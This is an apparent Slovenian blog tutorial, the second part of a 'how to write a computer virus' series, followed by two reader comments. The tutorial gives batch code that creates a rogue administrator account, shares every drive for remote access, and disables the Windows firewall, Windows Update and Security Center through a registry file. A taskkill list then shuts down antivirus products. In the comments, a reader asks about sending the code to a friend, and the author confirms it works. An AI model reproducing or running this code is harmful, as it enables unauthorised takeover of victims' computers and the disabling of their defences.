Kako narediti računalniški VIRUS? 2. del

Kako spisat VIRUS? (part2)

Preden začnete brati ta vodič, si oglejte še prvi del “Kako narediti računalniški VIRUS? 1. del” in vedite, da vodič ni namenjen za zlonamerna dejanja!

Spet se bomo posvetili BATCH programiranju..

Napisal bom primer, kako na oddaljenem računalniku omogočimo dostop do vseh datotek..

net user username /add
net localgroup Administrators username /add
net share c=C:\
net share d=D:\
net share e=E:\
echo (c) 2006 by mat3ii

Razložitev kode..
1. ukaz doda uporabnika z imenom “username”, tale username lahko spremenimo po svoji želji..
2. 3. in 4. ukaz doda c: d: in e: diske v skupno rabo.. kateri nam omogoči, da lahko dostopamo do njegovega diska..
5. ukaz pa itaq poznate že iz prvega vodiča..

Sedaj, ko imamo vse diske v skupni rabi, moramo na nek način vstopit v te diske. Ta korak se imenuje NET-bios hacking.. ker pa je teh postopkov veliko opisanih na internetu, ga nebom posebaj razlagal (več o tem tukaj)

Hja.. naš “virus” je vedno močnejši,.. ampak prejšnji primer nam ne pomaga, če ima oddaljen računalnik vključen firewall.. zato moramo za izvajanje svojega “virusa” vedno onemogočit firewall-le.. pa začnimo

Naslednji ukaz onemogoči Windows firewall (požarni zid), deluje na XP-jih.. pa poglejmo kako zgleda koda..

> “%Temp%.\kill.reg” ECHO REGEDIT4
>>”%Temp%.\kill.reg” ECHO.
>>”%Temp%.\kill.reg” ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>”%Temp%.\kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.\kill.reg” ECHO.
>>”%Temp%.\kill.reg” ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>”%Temp%.\kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.\kill.reg” ECHO.
>>”%Temp%.\kill.reg” ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>”%Temp%.\kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.\kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.\kill.reg”
DEL “%Temp%.\kill.reg”

Razložitev:
Prvih 11 vrstic ustvari “navidezno” datoteko v katerega zapiše ukaze za register (v bistvu preko registra, onemogoči firewall)
Predzadnja vrstica, ta file zažene, zadnja pa ga zbriše.. Juppi in windowsov požarni zid je izključen ]:)

Ostale firewalle, antivirusne programe,…. lahko “killamo” z ukazom taskkill
Primer:

taskkill /IM sophos.exe /F
taskkill /IM antivir.exe /F
taskkill /IM SpySub.exe /F
taskkill /IM Ypager.exe /F
taskkill /IM ZAPro.exe /F
taskkill /IM Zlclient.exe /F
taskkill /IM ZoneAlarm.exe /F

Kot smo sedaj že ugotovili je potrebno za dober virus samo pravilno sestaviti ukaze, in dobimo pošten “virus” za več ukazov išči google (batch commands).. To bo z moje strani vse o pisanju “virusov” z batch fajli,..

grizly3
26. February, 2008 ob 3:00 pm

“Napisal bom primer, kako na oddaljenem računalniku omogočimo dostop do vseh datotek..

net user username /add
net localgroup Administrators username /add
net share c=C:\
net share d=D:\
net share e=E:\
echo (c) 2006 by mat3ii”

Kaj pa če ima tist prijatel ku mu to pošlem že administratorja?
Kr sm to sam na moj računalnik hotu narest pa ni delal.
Aaa.. za ker OS pa je to? a je za Windows XP?

mat3ii
26. February, 2008 ob 3:48 pm

Glej prvi ukaz doda novega uporabnika v uporabniške račune računalnika, drugi ukaz pa doda tega uporabnika (prvi ukaz) pod grupo administratorjev, tako da nima veze, če ima računalnik že kakšnega administratorja, administratorjev je lahko več!

Koda pa deluje na vseh windowsih, če se ne motim, na xp-ju 100%